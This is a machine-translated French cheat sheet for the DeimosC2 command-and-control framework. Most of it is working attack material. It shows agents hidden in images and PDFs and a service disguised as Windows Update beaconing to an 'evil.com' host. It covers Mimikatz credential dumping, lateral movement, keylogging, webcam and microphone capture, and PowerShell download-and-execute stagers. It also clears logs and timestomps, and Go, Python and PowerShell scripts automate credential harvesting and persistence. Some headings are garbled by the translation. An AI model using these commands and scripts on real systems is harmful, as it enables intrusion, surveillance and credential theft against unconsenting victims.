DeimosC2 cadre feuille de chaleur
Aperçu général
DeimosC2 est un cadre de commandement et de contrôle post-exploitation basé sur le Golang conçu pour les opérations de l'équipe rouge et les essais de pénétration. Construit avec des principes d'architecture modernes, DeimosC2 se concentre sur la compatibilité multiplateforme, les communications sécurisées et les capacités post-exploitation complètes tout en maintenant une empreinte légère et des techniques d'évasion avancées.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install Go 1.18+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc
Installation depuis GitHub
# Clone DeimosC2 repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build the server
go mod tidy
go build -o deimosc2-server ./cmd/server
# Build the agent
go build -o deimosc2-agent ./cmd/agent
# Make executables
chmod +x deimosc2-server deimosc2-agent
```_
### Installation Docker
```bash
# Clone repository
git clone https://github.com/DeimosC2/DeimosC2.git
cd DeimosC2
# Build Docker image
docker build -t deimosc2 .
# Run DeimosC2 container
docker run -it --rm -p 8080:8080 -p 443:443 deimosc2
# Run with persistent data
docker run -it --rm -p 8080:8080 -p 443:443 -v $(pwd)/data:/app/data deimosc2
```_
### Compilation entre plaques
```bash
# Build for Windows (x64)
GOOS=windows GOARCH=amd64 go build -o deimosc2-agent.exe ./cmd/agent
# Build for Windows (x86)
GOOS=windows GOARCH=386 go build -o deimosc2-agent-x86.exe ./cmd/agent
# Build for Linux (x64)
GOOS=linux GOARCH=amd64 go build -o deimosc2-agent-linux ./cmd/agent
# Build for macOS (x64)
GOOS=darwin GOARCH=amd64 go build -o deimosc2-agent-macos ./cmd/agent
# Build for ARM64
GOOS=linux GOARCH=arm64 go build -o deimosc2-agent-arm64 ./cmd/agent
Utilisation de base
Démarrer le serveur
# Start DeimosC2 server with default settings
./deimosc2-server
# Start with custom configuration
./deimosc2-server -config config.json
# Start with specific interface and port
./deimosc2-server -host 0.0.0.0 -port 8080
# Start with HTTPS
./deimosc2-server -tls -cert server.crt -key server.key
# Start in debug mode
./deimosc2-server -debug
Fichier de configuration
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 8080,
"tls": \\\\{
"enabled": true,
"cert_file": "server.crt",
"key_file": "server.key"
\\\\},
"auth": \\\\{
"username": "admin",
"password": "SecurePassword123!"
\\\\}
\\\\},
"database": \\\\{
"type": "sqlite",
"connection": "deimos.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "deimos.log"
\\\\},
"agents": \\\\{
"check_in_interval": 30,
"jitter": 10,
"max_retries": 5
\\\\}
\\\\}
Accès à l'interface Web
# Access DeimosC2 web interface
http://localhost:8080
# HTTPS access
https://your-domain.com:443
# Default credentials (configurable)
Username: admin
Password: SecurePassword123!
Déploiement des agents
Exécution de l'agent de base
# Windows agent
deimosc2-agent.exe -server http://192.168.1.100:8080
# Linux agent
./deimosc2-agent-linux -server http://192.168.1.100:8080
# macOS agent
./deimosc2-agent-macos -server http://192.168.1.100:8080
# Agent with custom parameters
./deimosc2-agent -server https://c2.example.com:443 -interval 60 -jitter 20
Options de configuration de l'agent
# Command line options
./deimosc2-agent -h
Options:
-server string C2 server URL (required)
-interval int Check-in interval in seconds (default: 30)
-jitter int Jitter percentage (default: 10)
-user-agent string Custom User-Agent string
-proxy string Proxy URL (http://proxy:port)
-cert string Custom CA certificate file
-insecure Skip TLS certificate verification
-debug Enable debug logging
Déploiement stéréographique
# Embed agent in image
cat image.jpg deimosc2-agent.exe > hidden.jpg
# Extract and execute
tail -c +[image_size] hidden.jpg > agent.exe
./agent.exe -server http://192.168.1.100:8080
# Embed in PDF
cat document.pdf deimosc2-agent.exe > hidden.pdf
Installation de service (Windows)
# Install as Windows service
sc create "DeimosAgent" binPath= "C:\Windows\Temp\deimosc2-agent.exe -server http://192.168.1.100:8080" start= auto
sc start "DeimosAgent"
# Install with custom service name
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\deimosc2-agent.exe -server https://update.microsoft.com.evil.com:443" start= auto DisplayName= "Windows Update Service"
Commande et contrôle
Gestion des agents
# List active agents
agents list
# Get agent information
agents info [agent_id]
# Execute command on agent
agents exec [agent_id] "whoami"
# Execute PowerShell on Windows agent
agents exec [agent_id] "powershell Get-Process"
# Kill agent
agents kill [agent_id]
# Rename agent
agents rename [agent_id] [new_name]
Opérations de fichiers
# Download file from agent
download [agent_id] C:\Users\Administrator\Documents\sensitive.docx
# Upload file to agent
upload [agent_id] payload.exe C:\Windows\Temp\update.exe
# List directory contents
ls [agent_id] C:\Users\Administrator\Documents
# Change directory
cd [agent_id] C:\Windows\System32
# Create directory
mkdir [agent_id] C:\Windows\Temp\data
# Remove file
rm [agent_id] C:\Windows\Temp\payload.exe
Gestion des processus
# List processes
ps [agent_id]
# Kill process
kill [agent_id] [pid]
# Start process
start [agent_id] notepad.exe
# Process injection
inject [agent_id] [pid] [shellcode_file]
# Memory dump
memdump [agent_id] [pid] output.dmp
Opérations réseau
# Network discovery
discover [agent_id] 192.168.1.0/24
# Port scan
portscan [agent_id] 192.168.1.100 80,443,22,3389
# ARP scan
arpscan [agent_id] 192.168.1.0/24
# Network interfaces
ifconfig [agent_id]
# Routing table
route [agent_id]
# Network connections
netstat [agent_id]
Caractéristiques avancées
Mécanismes de persistance
# Registry persistence (Windows)
persist registry [agent_id] HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"
# Scheduled task persistence (Windows)
persist schtask [agent_id] "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"
# Service persistence (Windows)
persist service [agent_id] "WindowsUpdateService" "C:\Windows\Temp\agent.exe"
# Cron persistence (Linux)
persist cron [agent_id] "*/5 * * * * /tmp/agent"
# Autostart persistence (Linux)
persist autostart [agent_id] "/tmp/agent"
# LaunchAgent persistence (macOS)
persist launchagent [agent_id] "com.apple.update" "/tmp/agent"
Escalade des privilèges
# UAC bypass (Windows)
elevate uac [agent_id] [payload_path]
# Token manipulation (Windows)
elevate token [agent_id] [target_pid]
# Sudo exploitation (Linux)
elevate sudo [agent_id] [command]
# SUID exploitation (Linux)
elevate suid [agent_id]
# Kernel exploits
elevate kernel [agent_id] [exploit_name]
Mouvement latéral
# WMI execution (Windows)
lateral wmi [agent_id] 192.168.1.100 administrator password123 "whoami"
# PSExec execution (Windows)
lateral psexec [agent_id] 192.168.1.100 admin pass123 "systeminfo"
# PowerShell remoting (Windows)
lateral winrm [agent_id] 192.168.1.100 administrator password123 "Get-Process"
# SSH execution (Linux/macOS)
lateral ssh [agent_id] 192.168.1.50 root password123 "uname -a"
# SMB execution
lateral smb [agent_id] 192.168.1.100 admin pass123 "dir C:\"
Opérations liées aux titres de créance
# Dump credentials (Windows)
creds dump [agent_id]
# Mimikatz execution (Windows)
creds mimikatz [agent_id] "sekurlsa::logonpasswords"
# SAM dump (Windows)
creds sam [agent_id]
# LSA secrets (Windows)
creds lsa [agent_id]
# Browser credentials
creds browser [agent_id]
# SSH keys (Linux/macOS)
creds ssh [agent_id]
# Keychain dump (macOS)
creds keychain [agent_id]
Piment et tunnel
# SOCKS proxy
pivot socks [agent_id] 1080
# Port forwarding
pivot portfwd [agent_id] 8080 192.168.1.100 80
# Reverse port forwarding
pivot rportfwd [agent_id] 3389 127.0.0.1 3389
# HTTP tunnel
pivot http [agent_id] 8080
# DNS tunnel
pivot dns [agent_id] tunnel.example.com
Collecte de données
# Screenshot
screenshot [agent_id]
# Keylogger
keylog start [agent_id]
keylog stop [agent_id]
keylog dump [agent_id]
# Webcam capture
webcam [agent_id]
# Microphone recording
microphone [agent_id] 60
# Clipboard monitoring
clipboard [agent_id]
# File search
search [agent_id] C:\Users *.docx
# Registry search
regsearch [agent_id] HKLM password
Automatisation et écriture
Go Automation Script
package main
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
)
type DeimosClient struct \\\\{
BaseURL string
Username string
Password string
HTTPClient *http.Client
Token string
\\\\}
type Agent struct \\\\{
ID string `json:"id"`
Hostname string `json:"hostname"`
Username string `json:"username"`
OS string `json:"os"`
IP string `json:"ip"`
Status string `json:"status"`
\\\\}
type Command struct \\\\{
AgentID string `json:"agent_id"`
Command string `json:"command"`
Args string `json:"args"`
\\\\}
func NewDeimosClient(baseURL, username, password string) *DeimosClient \\\\{
return &DeimosClient\\\\{
BaseURL: baseURL,
Username: username,
Password: password,
HTTPClient: &http.Client\\\\{Timeout: 30 * time.Second\\\\},
\\\\}
\\\\}
func (c *DeimosClient) Authenticate() error \\\\{
authData := map[string]string\\\\{
"username": c.Username,
"password": c.Password,
\\\\}
jsonData, _ := json.Marshal(authData)
resp, err := c.HTTPClient.Post(c.BaseURL+"/api/auth", "application/json", bytes.NewBuffer(jsonData))
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
if resp.StatusCode == 200 \\\\{
var result map[string]string
json.NewDecoder(resp.Body).Decode(&result)
c.Token = result["token"]
return nil
\\\\}
return fmt.Errorf("authentication failed")
\\\\}
func (c *DeimosClient) GetAgents() ([]Agent, error) \\\\{
req, _ := http.NewRequest("GET", c.BaseURL+"/api/agents", nil)
req.Header.Set("Authorization", "Bearer "+c.Token)
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return nil, err
\\\\}
defer resp.Body.Close()
var agents []Agent
json.NewDecoder(resp.Body).Decode(&agents)
return agents, nil
\\\\}
func (c *DeimosClient) ExecuteCommand(agentID, command string) error \\\\{
cmdData := Command\\\\{
AgentID: agentID,
Command: command,
\\\\}
jsonData, _ := json.Marshal(cmdData)
req, _ := http.NewRequest("POST", c.BaseURL+"/api/execute", bytes.NewBuffer(jsonData))
req.Header.Set("Authorization", "Bearer "+c.Token)
req.Header.Set("Content-Type", "application/json")
resp, err := c.HTTPClient.Do(req)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\\\}
func (c *DeimosClient) AutomatedRecon(agentID string) \\\\{
commands := []string\\\\{
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a",
\\\\}
for _, cmd := range commands \\\\{
fmt.Printf("[+] Executing: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(2 * time.Second)
\\\\}
\\\\}
func (c *DeimosClient) EstablishPersistence(agentID string) \\\\{
persistenceCommands := []string\\\\{
"persist registry HKCU \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" \"WindowsUpdate\" \"C:\\Windows\\Temp\\agent.exe\"",
"persist schtask \"SystemUpdate\" \"C:\\Windows\\Temp\\agent.exe\" \"ONLOGON\"",
"persist service \"WindowsUpdateService\" \"C:\\Windows\\Temp\\agent.exe\"",
\\\\}
for _, cmd := range persistenceCommands \\\\{
fmt.Printf("[+] Establishing persistence: %s\n", cmd)
c.ExecuteCommand(agentID, cmd)
time.Sleep(3 * time.Second)
\\\\}
\\\\}
func main() \\\\{
client := NewDeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
// Authenticate
if err := client.Authenticate(); err != nil \\\\{
fmt.Printf("Authentication failed: %v\n", err)
return
\\\\}
// Get active agents
agents, err := client.GetAgents()
if err != nil \\\\{
fmt.Printf("Failed to get agents: %v\n", err)
return
\\\\}
fmt.Printf("[+] Found %d active agents\n", len(agents))
// Process each agent
for _, agent := range agents \\\\{
fmt.Printf("[+] Processing agent: %s (%s)\n", agent.ID, agent.Hostname)
// Perform reconnaissance
client.AutomatedRecon(agent.ID)
// Establish persistence
client.EstablishPersistence(agent.ID)
// Wait before processing next agent
time.Sleep(10 * time.Second)
\\\\}
\\\\}
Python Automation Script
#!/usr/bin/env python3
# DeimosC2 Python automation script
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class DeimosClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.username = username
self.password = password
self.session = requests.Session()
self.session.verify = False
self.token = None
def authenticate(self):
"""Authenticate with DeimosC2 server"""
auth_data = \\\\{
'username': self.username,
'password': self.password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/auth", json=auth_data)
if response.status_code == 200:
self.token = response.json().get('token')
self.session.headers.update(\\\\{'Authorization': f'Bearer \\\\{self.token\\\\}'\\\\})
print("[+] Authentication successful")
return True
else:
print("[-] Authentication failed")
return False
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents")
if response.status_code == 200:
return response.json()
return []
def execute_command(self, agent_id, command):
"""Execute command on agent"""
cmd_data = \\\\{
'agent_id': agent_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.status_code == 200
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
download_data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=download_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def upload_file(self, agent_id, local_path, remote_path):
"""Upload file to agent"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'agent_id': agent_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload", files=files, data=data)
return response.status_code == 200
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an",
"uname -a"
]
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(2)
def credential_harvesting(self, agent_id):
"""Harvest credentials from agent"""
commands = [
"creds dump",
"creds mimikatz \"sekurlsa::logonpasswords\"",
"creds sam",
"creds browser"
]
for cmd in commands:
print(f"[+] Harvesting credentials: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(5)
def establish_persistence(self, agent_id):
"""Establish persistence on agent"""
persistence_commands = [
'persist registry HKCU "Software\\Microsoft\\Windows\\CurrentVersion\\Run" "WindowsUpdate" "C:\\Windows\\Temp\\agent.exe"',
'persist schtask "SystemUpdate" "C:\\Windows\\Temp\\agent.exe" "ONLOGON"',
'persist service "WindowsUpdateService" "C:\\Windows\\Temp\\agent.exe"'
]
for cmd in persistence_commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def lateral_movement(self, agent_id, targets):
"""Perform lateral movement"""
for target in targets:
commands = [
f'lateral wmi \\\\{target\\\\} administrator password123 "whoami"',
f'lateral psexec \\\\{target\\\\} admin pass123 "systeminfo"',
f'lateral ssh \\\\{target\\\\} root password123 "uname -a"'
]
for cmd in commands:
print(f"[+] Lateral movement: \\\\{cmd\\\\}")
self.execute_command(agent_id, cmd)
time.sleep(3)
def main():
client = DeimosClient("http://192.168.1.100:8080", "admin", "SecurePassword123!")
# Authenticate
if not client.authenticate():
return
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\\{len(agents)\\\\} active agents")
# Process each agent
for agent in agents:
agent_id = agent['id']
hostname = agent.get('hostname', 'unknown')
print(f"[+] Processing agent: \\\\{agent_id\\\\} (\\\\{hostname\\\\})")
# Perform reconnaissance
client.automated_recon(agent_id)
# Harvest credentials
client.credential_harvesting(agent_id)
# Establish persistence
client.establish_persistence(agent_id)
# Lateral movement
targets = ["192.168.1.101", "192.168.1.102"]
client.lateral_movement(agent_id, targets)
# Wait before processing next agent
time.sleep(10)
if __name__ == "__main__":
main()
Automatisation PowerShell
# DeimosC2 PowerShell automation script
function Invoke-DeimosAutomation \\\\{
param(
[string]$ServerURL = "http://192.168.1.100:8080",
[string]$Username = "admin",
[string]$Password = "SecurePassword123!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\\{
username = $Username
password = $Password
\\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$ServerURL/api/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
$token = ($authResponse.Content|ConvertFrom-Json).token
$session.Headers.Add("Authorization", "Bearer $token")
Write-Host "[+] Authentication successful"
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
# Get active agents
try \\\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\\}
catch \\\\{
Write-Error "Failed to get agents: $_"
return
\\\\}
# Process each agent
foreach ($agent in $agents) \\\\{
$agentId = $agent.id
$hostname = $agent.hostname
Write-Host "[+] Processing agent: $agentId ($hostname)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'persist registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "WindowsUpdate" "C:\Windows\Temp\agent.exe"',
'persist schtask "SystemUpdate" "C:\Windows\Temp\agent.exe" "ONLOGON"'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
agent_id = $agentId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$ServerURL/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\\}
\\\\}
# Execute automation
Invoke-DeimosAutomation
Intégration avec d'autres outils
Intégration des métadonnées
# Use DeimosC2 for initial access, pivot to Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via DeimosC2 agent
upload [agent_id] meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
agents exec [agent_id] "C:\Windows\Temp\update.exe"
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Intégration de l'Empire
# Generate Empire stager
# Use DeimosC2 for initial access, pivot to Empire
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Intégration de la grève du cobalt
# Beacon integration
# Generate Cobalt Strike beacon
# Use DeimosC2 for initial access, pivot to Beacon
# From DeimosC2 agent
agents exec [agent_id] "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Sécurité opérationnelle
Sécurité des communications
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Generate SSL certificates
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Start DeimosC2 with SSL
./deimosc2-server -tls -cert server.crt -key server.key
Obfuscation de la circulation
# Use custom user agents
# Implement jitter and delays
# Mimic legitimate traffic patterns
# Use common ports and protocols
# Example obfuscated agent execution
./deimosc2-agent -server https://cdn.example.com:443 -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" -jitter 30
Anti-forensiques
# Clear event logs
agents exec [agent_id] "wevtutil cl System"
agents exec [agent_id] "wevtutil cl Security"
agents exec [agent_id] "wevtutil cl Application"
# Clear PowerShell history
agents exec [agent_id] "powershell Remove-Item (Get-PSReadlineOption).HistorySavePath -Force"
# Timestomping
agents exec [agent_id] "powershell $(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
Dépannage
Questions communes
# Agent not connecting
1. Check firewall rules
2. Verify server configuration
3. Test network connectivity
4. Check certificate issues
# Go build issues
go mod tidy
go clean -cache
# SSL certificate issues
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Mode de débogage
# Enable debug logging
./deimosc2-server -debug
# Agent debug mode
./deimosc2-agent -debug -server http://192.168.1.100:8080
# Check network connectivity
telnet 192.168.1.100 8080
Meilleures pratiques
Planification opérationnelle
- ** Configuration de pré-engagement**: Configurer le serveur et compiler les agents avant l'engagement
- Gestion des agents : Utiliser des noms d'agents descriptifs et organiser par réseau
- ** Protocoles de communication** : Établir des canaux de communication C2 sécurisés
- Gestion des données: Mettre en œuvre une collecte et un stockage sécurisés des données
- Procédures de nettoyage: Plan pour l'enlèvement des artefacts et le nettoyage des agents
Considérations en matière de sécurité
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent identifiers
# Implement agent timeouts
# Regular agent rotation
# Secure communication channels
Documentation et rapports
# Operation documentation
# Maintain agent logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Ressources
- [DéimosC2 GitHub Repository] (LINK_5)
- [Documentation DeimosC2] (LINK_5)
- [Aller en langage de programmation] (LINK_5)
- [Cadre MITRE ATT&CK] (LINK_5)
- Opérations de l'équipe rouge SANS
*Cette feuille de triche fournit une référence complète pour l'utilisation du framework DeimosC2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *